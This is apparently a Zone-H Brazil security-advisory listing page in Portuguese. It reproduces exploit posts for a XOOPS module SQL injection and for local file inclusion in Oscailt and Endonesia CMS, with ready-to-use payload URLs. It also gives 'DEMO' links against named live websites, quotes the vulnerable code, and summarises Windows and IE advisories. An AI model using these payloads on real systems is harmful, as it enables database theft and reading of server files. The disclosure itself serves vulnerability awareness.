Zone-H Advertisement
Home arrow Avisos de Segurança
03 de setembro de 2010
  
 
Ataques desta semana
O.S.  Defs.  %
Linux  9976  73.09%
Win 2003  3249  23.81%
FreeBSD  227  1.66%
Win 2000  66  0.48%
Unknown  48  0.35%
Other  82  0.60%

Total de ataques: 13648 dos quais 2757 único(s) no ip e 10891 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Avisos de Segurança
XOOPS 2.0.x Module Content 0.5 - Falha remota de SQL Injection Imprimir E-mail
Avaliação do Usuário: / 3
Por Marcelo Almeida (Vympel)   
04 de dezembro de 2009
# Arquivo com falha em  index.php : # #
# $id = isset($HTTP_GET_VARS['id']) ? intval($HTTP_GET_VARS['id']) : 0;
#
# if ($id != 0) {
# $result = $xoopsDB->queryF("SELECT storyid, title, text, visible, nohtml,
nosmiley, nobreaks, # nocomments, link, address FROM
".$xoopsDB->prefix(_MIC_CONTENT_PREFIX)." WHERE #storyid=$id");
#

[+]Xoops 2.0.x Module Content
[+]Donwload of
Module:http://prdownloads.sourceforge.net/xoops/XOOPS2_mod_content-0.5.zip?
download
[+]Author: s4r4d0
[+]mail: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo
[+]TEAM: Fatal Error
[+]Bug: Sql injection and Blind sql found in index.php
[+]Exploit:http://www.site.com/modules/content/index.php?id=-1+UNION+SELECT
+1,2,3,@@version,5,6,7,8,9,10,11--
[+]Greetz: Elemento_pcx - z4i0n - ir4 - sp3x - D3UX - veryn e Vympel
[+]Made in BRazil
 
Oscailt 3.3 CMS Local File Inclusion Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
18 de novembro de 2009 
[0] Oscailt 3.3 CMS 

[0] Download: http://sourceforge.net/projects/oscailt/

[0] Bug: Local File Inclusion in index.php file !

[0] Author: 
 
 Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo
 

[0] Team: Fatal Error

[0] Poc: http://www.site.com/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00

[0] DEMO:http://imemc.org/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00

[0] Greetz: Elemento_pcx - z4i0n - m4v3rick - HADES - Hualdo - Derf - DD3str0y3r - Obz !!!

[0] Made in Brazil - SP

[0] Source Code: 

# SecurityReason Note :

#

# The option "Use Friendly URL's" in configuration must be set off

#

# Vulnerable Code in index.php :

#

# $target_indyobject_id = getRequestTargetObjectID();

# ...

# if(!$use_live)

# {

...
Leia mais...
 
Endonesia 8.4 CMS Local File Inclusion Imprimir E-mail
Avaliação do Usuário: / 0
Por Marcelo Almeida (Vympel)   
18 de novembro de 2009 
[*] Endonesia 8.4 CMS



[*] Site: http://www.endonesia.org/



[*] Download: http://sourceforge.net/projects/endonesia



[*] Bug: Local File Inclusion in mod.php file !



[*] Author: s4r4d0



[*] Mail: 
 
 Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo
 



[*] Team: Fatal Error



[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00



[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00



[*] SecurityReason Note :



#



# Vulnerable Code in mod.php :



#



# include("./mod/$mod/index.php");



#



# magic_quotes = Off



#



# - sp3x



#



[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !



[*] Made in Brazil
 
Xoops Celepar Module Quas SQL Injection Imprimir E-mail
Avaliação do Usuário: / 4
Por Marcelo Almeida (Vympel)   
24 de julho de 2009
**********************************************************************************************************
Xoops Celepar Module Qas
Donwload of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
mail: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo
**********************************************************************************************************
Uma falha de Sql Injection foi encotrada no módulo Quas do Xoops Celepar no arquivo Aviso.php ...
Leia mais...
 
Microsoft Windows Graphics DeviceInterface Integer Overflow Vulnerability Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
09 de dezembro de 2008
A iDEFENSE, publicou um alerta de segurança que afeta o módulo GDI (graphics device interface ) do Windows, o qual é usado para mostrar imagens e texto formatados em diversas aplicações, tanto no vídeo quanto na impressora.
Uma exploração desta falha de "integer overflow", pode resultar na execução de comandos remotos em diversas versões do Windows, com privilégios do usuário que estiver logado.

Abaixo segue o aviso original...
Leia mais...
 
Microsoft Internet Explorer5.01 EMBED tag Long File Name Extension Stack Buffer OverflowVulnerabilit Imprimir E-mail
Avaliação do Usuário: / 9
Por Marcelo Almeida (Vympel)   
09 de dezembro de 2008
A iDEFENSE, publicou um alerta de segurança que afeta o Internet Explorer 5.01 até o 6.
Dependendo da versão do sistema operacional, esta falha pode gerar, desde um fechamento inesperado do browser ou até uma execução de comandos arbitrários.
Abaixo segue uma cópia do aviso original...
Leia mais...
 
Mais...
<< Início < Anterior 1 2 3 4 5 6 7 8 9 10 Próximo > Fim >>

Resultados 1 - 26 de 240
[Voltar]
 
Top!
(C) 2010 Zone-H - Unrestricted Information
Top!